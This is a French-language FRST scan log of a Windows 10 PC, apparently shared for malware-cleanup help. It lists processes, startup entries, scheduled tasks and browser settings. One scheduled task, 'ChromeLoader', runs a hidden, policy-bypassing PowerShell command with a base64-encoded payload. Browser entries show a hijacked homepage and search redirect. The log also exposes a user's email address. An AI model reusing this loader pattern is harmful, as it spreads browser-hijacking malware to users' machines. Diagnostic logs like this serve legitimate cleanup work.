Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 10-01-2022 01 Exécuté par alexc (administrateur) sur DESKTOP-VB0KPH1 (Wortmann_AG EU1001291;2120131) (12-01-2022 20:41:10) Exécuté depuis C:\Users\alexc\Downloads Profils chargés: alexc & cogno Plate-forme: Microsoft Windows 10 Professionnel Version 20H2 19042.1415 (X64) Langue: Français (France) Navigateur par défaut: Chrome Mode d'amorçage: Normal ==================== Processus (Avec liste blanche) ================= (Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.) (Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe <2> (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe (Adobe Systems Incorporated) C:\Program Files\WindowsApps\AdobeNotificationClient_1.0.1.22_x86__enpm4xejd91yc\AdobeNotificationClient.exe (Adobe Systems Incorporated) C:\Program Files\WindowsApps\ReaderNotificationClient_1.0.4.0_x86__e1rzdqpraam7r\AcrobatNotificationClient.exe (Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe (AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DTAgent.exe (CyberGhost S.R.L. -> CyberGhost S.R.L.) C:\Program Files\CyberGhost 8\Dashboard.exe (CyberGhost S.R.L. -> CyberGhost S.R.L.) C:\Program Files\CyberGhost 8\Dashboard.Service.exe (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <14> (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe (LogMeIn, Inc. -> LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe (LogMeIn, Inc. -> LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe (MacPaw, Inc. -> MacPaw Inc.) C:\Program Files\CleanMyPC\CleanMyPCService.exe (Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe (Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe (Mega Limited -> Mega Limited) C:\Users\alexc\AppData\Local\MEGAsync\MEGAsync.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_3.2111.12605.0_x64__8wekyb3d8bbwe\Cortana.exe (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_3.2111.12605.0_x64__8wekyb3d8bbwe\Win32Bridge.Server.exe (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservices.exe (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2> (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MoUsoCoreWorker.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.) C:\Windows\System32\amdfendrsr.exe (Node.js Foundation -> Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\libs\node.exe (Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3> (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3> (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_3784df9edffd3314\Display.NvContainer\NVDisplay.Container.exe <2> (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe <2> (rocksdanister) C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.85.0_x86__97hta09mmv6hy\livelywpf\livelywpf.exe (Shanghai Microvirt Software Technology Co., Ltd. -> ) C:\Program Files\Microvirt\MEmu\MemuService.exe (The CefSharp Authors) [Fichier non signé] C:\Program Files\CyberGhost 8\Data\Cef\x64\CefSharp.BrowserSubprocess.exe <2> (Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\AMSP\coreFrameworkHost.exe (Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe (Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\DiamondRing\DrSDKCaller.exe (Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSvcHost.exe (Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtWatchDog.exe (Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\UniClient\UiFrmwrk\uiSeAgnt.exe (Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\UniClient\UiFrmwrk\uiWatchDog.exe (Wacom Technology Corp. -> Wacom Technology) C:\Program Files\Tablet\Wacom\WacomHost.exe (Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_Tablet.exe (Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TabletUser.exe (Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe (Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe (Wargaming.net Limited -> Wargaming.net) C:\ProgramData\Wargaming.net\GameCenter\dlls\wgc_renderer_host.exe <3> (Wargaming.net Limited -> Wargaming.net) C:\ProgramData\Wargaming.net\GameCenter\wargamingerrormonitor.exe (Wargaming.net Limited -> Wargaming.net) C:\ProgramData\Wargaming.net\GameCenter\wgc.exe ==================== Registre (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.) HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\RtkAudUService64.exe [757184 2018-06-28] (Realtek Semiconductor Corp. -> Realtek Semiconductor) HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3426560 2021-11-23] (Adobe Inc. -> Adobe Systems, Incorporated) HKLM\...\Run: [Trend Micro Client Framework] => C:\Program Files\Trend Micro\UniClient\UiFrmWrk\UIWatchDog.exe [246112 2019-07-29] (Trend Micro, Inc. -> Trend Micro Inc.) HKLM\...\Run: [Platinum] => C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSessionAgent.exe [1246368 2019-07-29] (Trend Micro, Inc. -> Trend Micro Inc.) HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3086208 2021-06-22] (Riot Games, Inc. -> Riot Games, Inc.) HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [5890504 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.) HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-16] (Oracle America, Inc. -> Oracle Corporation) HKU\S-1-5-21-1722835910-503718021-2123007925-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4267432 2021-12-16] (Valve Corp. -> Valve Corporation) HKU\S-1-5-21-1722835910-503718021-2123007925-1001\...\Run: [CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [144008 2019-10-22] (Adobe Inc. -> Adobe Systems Incorporated) HKU\S-1-5-21-1722835910-503718021-2123007925-1001\...\Run: [Chromium] => "c:\users\alexc\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session HKU\S-1-5-21-1722835910-503718021-2123007925-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [33618400 2021-12-15] (Epic Games Inc. -> Epic Games, Inc.) HKU\S-1-5-21-1722835910-503718021-2123007925-1001\...\Run: [Discord] => C:\Users\alexc\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub) HKU\S-1-5-21-1722835910-503718021-2123007925-1001\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe [5407968 2021-12-24] (Adobe Inc. -> Adobe Systems Incorporated) HKU\S-1-5-21-1722835910-503718021-2123007925-1001\...\Run: [utweb] => "C:\Users\alexc\AppData\Roaming\uTorrent Web\utweb.exe" /MINIMIZED (Pas de fichier) HKU\S-1-5-21-1722835910-503718021-2123007925-1001\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [409280 2021-05-14] (AVB Disc Soft, SIA -> Disc Soft Ltd) HKU\S-1-5-21-1722835910-503718021-2123007925-1001\...\Run: [CyberGhost] => C:\Program Files\CyberGhost 8\Dashboard.exe [1342704 2021-11-25] (CyberGhost S.R.L. -> CyberGhost S.R.L.) HKU\S-1-5-21-1722835910-503718021-2123007925-1001\...\Run: [Wargaming.net Game Center] => C:\ProgramData\Wargaming.net\GameCenter\wgc.exe [2148288 2021-12-10] (Wargaming.net Limited -> Wargaming.net) HKU\S-1-5-21-1722835910-503718021-2123007925-1001\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe [1802072 2022-01-11] (Overwolf Ltd -> Overwolf Ltd.) HKU\S-1-5-21-1722835910-503718021-2123007925-1001\...\Run: [SoundID Reference.exe] => C:\Program Files\Sonarworks\SoundID Reference\Systemwide\SoundID Reference.exe --hide-systemwide (Pas de fichier) HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\97.0.4692.71\Installer\chrmstp.exe [2022-01-08] (Google LLC -> Google LLC) Startup: C:\Users\alexc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2021-09-17] ShortcutTarget: MEGAsync.lnk -> C:\Users\alexc\AppData\Local\MEGAsync\MEGAsync.exe (Mega Limited -> Mega Limited) GroupPolicy: Restriction ? <==== ATTENTION Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION ==================== Tâches planifiées (Avec liste blanche) ============ (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) Task: {03AA5DC3-4652-436D-B4F2-E9358D97BDB4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154920 2019-06-08] (Google Inc -> Google LLC) Task: {0612F28F-8B5E-455A-AFDA-7130AE09D394} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [904904 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {1BD5F111-85B2-455A-AF28-268C9913C0B4} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2539864 2022-01-11] (Overwolf Ltd -> Overwolf LTD) Task: {1C4A1181-1E34-490E-A191-39D3E6AA0FB2} - System32\Tasks\Opera scheduled Autoupdate 1588591720 => C:\Users\alexc\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier) Task: {1E737F6E-E3CA-4B90-811F-477EDA5F34D9} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1650384 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {215E74E8-A236-4566-9749-B8C68E1D463F} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [903024 2021-11-16] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log Task: {2647AEEF-0441-4D7E-88DF-B82BC9814922} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-1722835910-503718021-2123007925-1001 => C:\Users\alexc\AppData\Local\MEGAsync\MEGAupdater.exe [2531504 2021-12-17] (Mega Limited -> ) Task: {28FE8055-FDFE-4E5B-A0B6-280A789F8B54} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1564424 2021-11-17] (Adobe Inc. -> Adobe Inc.) Task: {29F2D10B-663F-40C4-B634-D997693BBE92} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1650384 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {2CCBA2E7-941D-4323-B415-272D7501A228} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-alexcognon@yahoo.fr => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe -mode=scheduled (Pas de fichier) Task: {360F1628-9CFC-493D-B4FA-64450B4967D1} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [29417088 2021-11-12] (Piriform Software Ltd -> Piriform Software Ltd) Task: {3A7151BC-6463-4274-974D-9122B0503DFB} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1650384 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {3D1A332F-D70E-496C-962B-9D5E13343D51} - System32\Tasks\Opera scheduled assistant Autoupdate 1588591725 => C:\Users\alexc\AppData\Local\Programs\Opera\launcher.exe -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\alexc\AppData\Local\Programs\Opera\assistant" $(Arg0) Task: {48CB83BA-A805-4A4B-A23B-3D4A8B9B3F45} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3341312 2021-12-09] (Nvidia Corporation -> NVIDIA Corporation) Task: {587FD7CB-D6F0-4734-86D5-91EC4B3BB18F} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [684976 2021-07-16] (Piriform Software Ltd -> Piriform) Task: {74D18A00-9048-4ACC-A4E9-95ABAA47C47E} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23081848 2021-12-13] (Microsoft Corporation -> Microsoft Corporation) Task: {772D1E31-E098-492B-BAF4-5BFC7E94318B} - System32\Tasks\AMDInstallLauncher => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe /InstallAUEP (Pas de fichier) Task: {78191C03-BA20-46E1-ADC6-A6210FB8DB02} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4004256 2021-12-29] (Microsoft Corporation -> Microsoft Corporation) Task: {7E11B7E3-6BA9-4753-B443-CB4AC970CEFC} - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -AMDLinkUpdate (Pas de fichier) Task: {99423343-A9BE-485F-8348-8E1B4DC190C2} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 4315 caractères en plus). <==== ATTENTION Task: {A703D0C3-C25E-4CF7-93BB-1FC9F2C31E04} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [649216 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {A72B5053-AFFD-4DE3-80AD-EB86DA93C378} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23081848 2021-12-13] (Microsoft Corporation -> Microsoft Corporation) Task: {A7DD9E82-E8DE-4BEF-891B-6477B491A08A} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4004256 2021-12-29] (Microsoft Corporation -> Microsoft Corporation) Task: {AEA6100F-2BD9-4726-AA03-BD3E10767A63} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [61624 2020-11-13] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) Task: {B42F05C2-B012-4A35-9B73-F14DF01EE239} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1650384 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {C2A22112-088F-48B4-978F-B31ED194C1C9} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3426560 2021-11-23] (Adobe Inc. -> Adobe Systems, Incorporated) Task: {D1C4FDC3-9A14-4190-84AC-E2E8085DC619} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154920 2019-06-08] (Google Inc -> Google LLC) Task: {E683BA5D-157F-409A-93A2-4376410A1B13} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [1133976 2021-12-29] (Microsoft Corporation -> Microsoft Corporation) Task: {E6B81C58-937F-450E-A524-0E2C7189AABE} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [904904 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation) Task: {E724878E-EE4F-42C4-8A67-05D488CE90E4} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [69304 2020-11-13] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) Task: {F60FFCF0-347E-4B79-9277-7762EEE82754} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [116144 2021-12-29] (Microsoft Corporation -> Microsoft Corporation) Task: {F63E5495-2706-4DEC-871B-B4F532C7E2A2} - System32\Tasks\CleanMyPCSkipUAC => C:\Program Files\CleanMyPC\CleanMyPC.exe [24297128 2021-11-30] (MacPaw, Inc. -> MacPaw Inc.) Task: {FDCB9A58-A443-4E4C-9C93-02558D3C1819} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [116144 2021-12-29] (Microsoft Corporation -> Microsoft Corporation) (Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.) Task: C:\WINDOWS\Tasks\bf199a47-3403-4e8c-810c-b36278ff7684.job => C:\Program Files\Trend Micro\Titanium\plugin\Pt\win32\Inspect\Inspect.exe ==================== Internet (Avec liste blanche) ==================== (Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.) Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.) Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.) Hosts: Il y a plus d'un élément dans hosts. Voir la section Hosts de Addition.txt Tcpip\Parameters: [DhcpNameServer] 192.168.0.254 Tcpip\..\Interfaces\{23ee80a3-49a0-469a-9064-a23d1240a1e7}: [DhcpNameServer] 192.168.0.254 Tcpip\..\Interfaces\{70740488-2658-4e8c-9791-3bdeabe2f595}: [DhcpNameServer] 192.168.0.254 Tcpip\..\Interfaces\{ba957f2d-ac84-4d72-9564-68bb195aa21f}: [DhcpNameServer] 172.20.10.1 Edge: ======= Edge HomeButtonPage: HKU\S-1-5-21-1722835910-503718021-2123007925-1001 -> hxxps://www.yandex.ru/?win=463&clid=2341035-18 Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)] Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)] Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)] Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)] Edge DefaultProfile: Default Edge Profile: C:\Users\alexc\AppData\Local\Microsoft\Edge\User Data\Default [2022-01-11] Edge DefaultSearchURL: Default -> hxxps://fr.search.yahoo.com/yhs/search?hspart=ner&hsimp=yhs-001&type=aee_84d015defd161c9282¶m1=ArFaIWJoNqArQGMVADwgQGR7B7NoN9InxrFbMmYsQGMVw7ofB6poNqAqAXFaIWQBvmE4ICILNopcGWUIvmFdICIVNVI4ISoVNVE4J6k4NVQ3vqYXNVBdJ6IWwVM3vCILNVJdESk8NUM9Jmk3vmk3vCILNFdbDSk8vFE9ImoVvFQ9ImIVwVA3vCoXwV5cGWUWvmFcJmoUNEA3vCILNFdcIaUXNEBcGqQANFdcFCk8NoM9JGYXwVM3vGYXvmo9ISoUwVw9JGYYvFJdISISNVJdJGYTvFI9I6IYwVVdJ6IVwVw4JaYVvmpdJCIVwVI9JaYUwVM9ISIVvFRbFCILNF9cIqUXNolcEqULNopcGWUIvmFbF6IYwVVcG6IXvFM4ICoWwVQ9I6k4vmpcFCIVwVw4IGUJvFI9J6ISNEM4JmoWwVM9I6k3wVNcFSIYwVQ3vmoVNEY4JaUIwVQ4JaQIwV5dJGYNvmE4ICILNFRbDqUDNEJcFaULvmE9GqUINolcJqUJNEQ3wCIWvFI4JmoVwVI4ISk4wVU4ISIWQGR7B6RoN9J8LWZ6MWZcMWZoNqAsQGMVvDIlC6MuNGouNasuwCYpC7EmyCYbxU1dNU1dNXFbMn0aC6AoxrFaIWVdOqZoNqAexbFaIUwkynIew6NoNpRcNXFbJpseyDF%3D¶m2=MGN9NqF6Matb&p={searchTerms} Edge DefaultSearchKeyword: Default -> search by yahoo FireFox: ======== FF ProfilePath: C:\Users\alexc\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default [2020-11-15] FF Homepage: Mozilla\Firefox\Profiles\nahd6ha2.default -> hxxps://www.yandex.ru/?win=463&clid=2341035-18 FF SearchPlugin: C:\Users\alexc\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\searchplugins\yandex.ru-20202315.xml [2020-11-15] FF HKLM\...\Firefox\Extensions: [fftmtoolbar@trendmicro.com] - C:\Program Files\Trend Micro\Titanium\UIFramework\Toolbar\fftmtoolbar@trendmicro.com.xpi FF Extension: (Trend Micro Toolbar) - C:\Program Files\Trend Micro\Titanium\UIFramework\Toolbar\fftmtoolbar@trendmicro.com.xpi [2019-11-05] FF HKLM-x32\...\Firefox\Extensions: [fftmtoolbar@trendmicro.com] - C:\Program Files\Trend Micro\Titanium\UIFramework\Toolbar\fftmtoolbar@trendmicro.com.xpi FF Plugin: @java.com/DTPlugin,version=11.271.2 -> C:\Program Files\Java\jre1.8.0_271\bin\dtplugin\npDeployJava1.dll [2020-10-27] (Oracle America, Inc. -> Oracle Corporation) FF Plugin: @java.com/JavaPlugin,version=11.271.2 -> C:\Program Files\Java\jre1.8.0_271\bin\plugin2\npjp2.dll [2020-10-27] (Oracle America, Inc. -> Oracle Corporation) FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2019-07-05] (Adobe Inc. -> Adobe Systems) FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2021-07-20] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2021-07-20] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2021-12-24] (Adobe Inc. -> Adobe Systems Inc.) FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2019-07-05] (Adobe Inc. -> Adobe Systems) Chrome: ======= CHR DefaultProfile: Default CHR Profile: C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default [2022-01-12] CHR Notifications: Default -> hxxps://app.slack.com; hxxps://aternos.org; hxxps://download-alert.com; hxxps://maviedechat.net; hxxps://p4.maranhesduve.club; hxxps://padlet.com; hxxps://personal-video.live; hxxps://qbqra.mybuzz.fun; hxxps://tvplusnewtab.com; hxxps://userscloud.com; hxxps://www.marmiton.org; hxxps://www.serials.ws; hxxps://www1a.debrahinton.pro; hxxps://www1a.ramirocampos.pro; hxxps://www51.zippyshare.com CHR HomePage: Default -> 